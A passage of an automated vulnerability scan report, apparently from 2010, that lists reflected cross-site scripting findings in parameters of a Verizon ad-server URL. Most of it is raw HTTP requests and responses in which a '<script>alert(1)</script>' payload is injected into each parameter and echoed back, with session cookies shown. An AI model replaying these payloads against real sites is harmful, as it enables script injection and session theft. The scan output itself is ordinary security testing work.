GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1402
Content-Type: text/html
Cache-Control: private
Content-Length: 1402

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1" target="_top">
...[SNIP]...

3.17. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4037b"><script>alert(1)</script>d2c2ef8cfb7 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
g/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.18. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c09"><script>alert(1)</script>9bf55b7778c was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.19. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd800"><script>alert(1)</script>1fbf2886a4d was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ty=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4b8"><script>alert(1)</script>f43c1bd4bbd was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" targe
...[SNIP]...

3.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a4"><script>alert(1)</script>1e832059d7 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
lick_lx.ads/vzsurround2.net/homepage/L24/128228188/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&au
...[SNIP]...

3.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7caf7"><script>alert(1)</script>50a54869684 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ge/L24/1187278687/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email
...[SNIP]...

3.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da7f"><script>alert(1)</script>dd21dfded12 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
716448215/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhos
...[SNIP]...

3.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d09c"><script>alert(1)</script>fd46850320a was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1685458801/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_b
...[SNIP]...

3.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047a"><script>alert(1)</script>d1e5424609b was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ine.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/744514784/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=
...[SNIP]...

3.26. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b4c"><script>alert(1)</script>f168f1782af was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
